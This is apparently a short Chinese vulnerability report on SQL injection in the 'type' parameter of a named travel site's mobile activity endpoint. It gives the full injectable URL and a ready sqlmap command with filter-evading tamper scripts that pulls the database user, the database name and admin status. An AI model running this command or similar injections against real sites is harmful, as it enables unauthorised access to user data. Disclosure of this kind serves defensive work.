注入地址:
http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217
其中type存在注入
sqlmap测试
sqlmap.py -u "http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217" --threads 10 --current-user --current-db --is-dba -p type --tamper between.py,randomcase.py,space2comment.py





太慢了,就不继续了!~~~